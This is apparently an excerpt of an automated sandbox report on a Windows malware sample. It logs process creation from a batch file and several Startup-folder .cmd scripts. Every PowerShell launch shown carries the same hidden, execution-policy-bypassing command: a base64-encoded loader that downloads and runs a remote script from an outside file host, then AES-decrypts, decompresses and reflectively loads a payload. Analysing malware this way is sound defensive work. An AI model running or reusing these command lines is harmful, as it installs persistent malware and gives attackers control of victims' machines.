XRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\uowzo4rEa5.bat" Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0FJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\qmkvvvalmabsljlqxrjezibbbpjp"Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\qmkvvvalmabsljlqxrjezibbbpjp"Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\tgpownlmaitfopzcgbvycvwscdtqzgg"Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\tgpownlmaitfopzcgbvycvwscdtqzgg"Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\tgpownlmaitfopzcgbvycvwscdtqzgg"Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\tgpownlmaitfopzcgbvycvwscdtqzgg"Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\didgwgwgoqljydvgxmqznirblkkzsrxppo"Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_82916eff.cmd" Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0FJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_5d6f97d4.cmd" Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0FJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_afc64e18.cmd" Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0FJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_30ab010e.cmd" Jump to behavior
